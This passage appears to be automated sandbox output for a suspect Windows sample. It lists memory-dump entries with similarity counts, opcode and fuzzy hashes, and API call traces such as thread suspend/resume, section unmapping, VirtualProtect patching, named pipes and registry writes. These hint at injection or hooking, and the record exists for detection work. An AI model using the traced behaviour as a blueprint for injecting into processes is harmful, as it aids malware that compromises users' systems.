  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
